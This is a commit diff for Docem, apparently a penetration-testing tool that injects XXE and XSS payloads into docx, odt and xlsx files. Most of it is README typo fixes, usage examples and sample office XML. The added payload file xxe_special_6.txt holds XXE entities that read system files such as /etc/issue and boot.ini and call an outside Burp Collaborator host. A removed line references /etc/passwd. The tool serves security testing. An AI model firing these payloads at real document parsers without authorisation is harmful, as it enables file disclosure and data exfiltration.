relevant payload examples added

README.md

@@ -1,4 +1,4 @@
-сф
+
 ```
 _|_|_|                                                  
 _|    _|    _|_|      _|_|_|    _|_|    _|_|_|  _|_|    
@@ -25,10 +25,10 @@ So why not embed XXE payloads in them?
 That was done by a great [research](http://oxmlxxe.github.io/reveal.js/slides.html#/) by Will Vandevanter (`_will_is`)
 To create such documents with embedded payloads there is a famous tool called [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe). 
 
-But. It is not convinient to use `oxml_xxe` when you need to create hundreds of documents with payloads in different places.
+But. It is not convenient to use `oxml_xxe` when you need to create hundreds of documents with payloads in different places.
 So there it goes - Docem.
 
-It works like that: You specify sample document - that is a doc that has some `magic_symbols` (in illustratuin it is `፨` (in program it is constant `XXCb8bBA9XX`))  that will be replaced by your refernce to a payload in case of XXE payload, or will be replaces by your XSS payload.
+It works like that: You specify sample document - that is a doc that has some `magic_symbols` (in illustrations it is marked as `፨` (in program it is constant `XXCb8bBA9XX`))  that will be replaced by your reference to a payload in case of XXE payload, or will be replaces by your XSS payload.
 
 Also there are three different types of `payload_type` - every type determine how every `magic_symbol` will be processed for a given file in a document.
 Every `payload_type` described in section `Usage`.
@@ -65,7 +65,7 @@ python3 docem.py --help
 - optional
 	- `-pt` - payload type
 		- `per_document` - (default mode) for every payload, embed payload in all places in all files and create new doc
-		- `per_file` - for every payload, for every file inside a docuement, for all places inside file embed payload and create new doc
+		- `per_file` - for every payload, for every file inside a document, for all places inside file embed payload and create new doc
 		- `per_place` - for every payload, for every place in every file, embed payload and create new doc
 	- `-pf` - payoload file
 	- `-kt` - do not delete temp folders in tmp 
@@ -74,10 +74,15 @@ python3 docem.py --help
 
 Examples 
 ```bash
-./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx
+./docem.py -s samples/xxe/docx_sample_oxml_xxe_mod0/ -pm xss -pf payloads/xxe_special_6.txt -pt per_document -kt -sx docx
+./docem.py -s samples/xxe/docx_sample_oxml_xxe_mod1/ -pm xss -pf payloads/xxe_special_1.txt -pt per_file -kt -sx docx
 ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place
 ./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place
-./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx
+```
+
+An equivalent to a `docx` file created by OXML_XXE 
+```
+./docem.py -s samples/xxe/docx_sample_oxml_xxe_mod0/ -pm xss -pf payloads/xxe_special_6.txt -pt per_document -kt -sx docx
 ```
 
 
@@ -86,7 +91,7 @@ Examples
 ### Via new file
 
 1. Extract your document `example.docx`
-2. Add magic symbols - `፨` (yes, literally - those fancy 5 dots) in places where you want payloads to be embed
+2. Add magic symbols - `XXCb8bBA9XX` - (depicted as `፨` in illustrations of this readme) in places where you want payloads to be embed
 3. Zip your new sample into `example_modified0.zip`
 4. Rename extension - `example_modified0.docx`
 5. Use new sample with tool

docem.py

@@ -429,10 +429,10 @@ def interface_print_logo():
 
 def interface_print_example():
 	examples = 	[
-		'./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx',
+		'./docem.py -s samples/xxe/docx_sample_oxml_xxe_mod0/ -pm xss -pf payloads/xxe_special_6.txt -pt per_document -kt -sx docx',
+		'./docem.py -s samples/xxe/docx_sample_oxml_xxe_mod1/ -pm xss -pf payloads/xxe_special_1.txt -pt per_file -kt -sx docx',
 		'./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place',
-		'./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place',
-		'./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx'
+		'./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place'
 	]
 
 	print('Examples:\n%s\n' % '\n'.join(e for e in examples))
@@ -487,13 +487,13 @@ def interface_print_example():
 				os.mkdir(paths["path_to_tmp"])
 
 			print('\n=========== Current setup ===========')
-			print('sample file:\t\t',args.sample)
-			print('sample is it dir:\t',paths['sample_type_is_folder'])
+			print('sample file path:\t\t',args.sample)
+			print('sample is a directory:\t',paths['sample_type_is_folder'])
 			print('payload mode:\t\t',args.payload_mode)
 			print('payload file:\t\t',args.payload_file)
 			print('payload type:\t\t',args.payload_type)
 			print('number of payloads:\t',len(payloads))
-			print('keep upacked files:\t',args.keep_tmp)
+			print('keep unpacked files:\t',args.keep_tmp)
 
 			document_unpack(paths)
 			tree = document_tree_generate(paths)

payloads/xxe_special_6.txt

@@ -0,0 +1,5 @@
+{"vector":"<!DOCTYPE docem [<!ENTITY xxe_canary_0 \"XXE_STRING\">]>","reference":"&xxe_canary_0;"}
+{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_4 SYSTEM \"file:///c:/boot.ini\">]>","reference":"&xxe_canary_4;"}
+{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_5 SYSTEM \"file:///etc/issue\">]>","reference":"&xxe_canary_5;"}
+{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY % xxe_canary_6 SYSTEM \"file:///etc/issue\"><!ENTITY % dtd SYSTEM \"6fmvyndjd45a0letj7jj7dzej5pvdk.burpcollaborator.net\">%dtd;%trick;]>  ]>","reference":""}
+{"vector":"<!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_7 SYSTEM \"http://6fmvyndjd45a0letj7jj7dzej5pvdk.burpcollaborator.net\">]>","reference":"&xxe_canary_7;"}

samples/xxe/sample_oxml_xxe/word/document.xml → samples/xxe/docx_sample_oxml_xxe/word/document.xml

@@ -1,2 +1,2 @@
-<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE roottag PUBLIC "-//OXML/XXE/EN" "http://127.0.0.1/a.dtd//etc/passwd">
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><w:body><w:p w:rsidR="00CB06A3" w:rsidRDefault="00CB06A3"><w:r><w:t>Sample</w:t></w:r></w:p><w:p w:rsidR="00CB06A3" w:rsidRDefault="00CB06A3"><w:r w:rsidRPr="00CB06A3"><w:t>§</w:t></w:r><w:r><w:t xml:space="preserve"> Replace1</w:t></w:r><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/></w:p><w:sectPr w:rsidR="00CB06A3"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><w:body><w:p w:rsidR="00CB06A3" w:rsidRDefault="00CB06A3"><w:r><w:t>Sample</w:t></w:r></w:p><w:p w:rsidR="00CB06A3" w:rsidRDefault="00CB06A3"><w:r w:rsidRPr="00CB06A3"><w:t>XXCb8bBA9XX</w:t></w:r><w:r><w:t xml:space="preserve">XXCb8bBA9XX</w:t></w:r><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/></w:p><w:sectPr w:rsidR="00CB06A3"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

samples/xxe/xlsx_created_in_wps2_basic/[Content_Types].xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/custom.xml" ContentType="application/vnd.openxmlformats-officedocument.custom-properties+xml"/><Override PartName="/xl/sharedStrings.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sharedStrings+xml"/><Override PartName="/xl/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml"/><Override PartName="/xl/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/></Types>

samples/xxe/xlsx_created_in_wps2_basic/_rels/.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/custom-properties" Target="docProps/custom.xml"/></Relationships>

samples/xxe/xlsx_created_in_wps2_basic/docProps/app.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Application>WPS Spreadsheets</Application><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>工作表</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr>Sheet1</vt:lpstr></vt:vector></TitlesOfParts></Properties>

samples/xxe/xlsx_created_in_wps2_basic/docProps/core.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:creator>test</dc:creator><cp:lastModifiedBy>test</cp:lastModifiedBy><dcterms:created xsi:type="dcterms:W3CDTF">2020-07-05T12:18:39Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-05T12:20:09Z</dcterms:modified></cp:coreProperties>

samples/xxe/xlsx_created_in_wps2_basic/docProps/custom.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="2" name="KSOProductBuildVer"><vt:lpwstr>1033-11.1.0.8722</vt:lpwstr></property></Properties>

samples/xxe/xlsx_created_in_wps2_basic/xl/_rels/workbook.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/sharedStrings" Target="sharedStrings.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/></Relationships>

samples/xxe/xlsx_created_in_wps2_basic/xl/sharedStrings.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4" uniqueCount="4"><si><t>XXCb8bBA9XX</t></si><si><t>col2</t></si><si><t>XXCb8bBA9XX</t></si><si><t>data2</t></si></sst>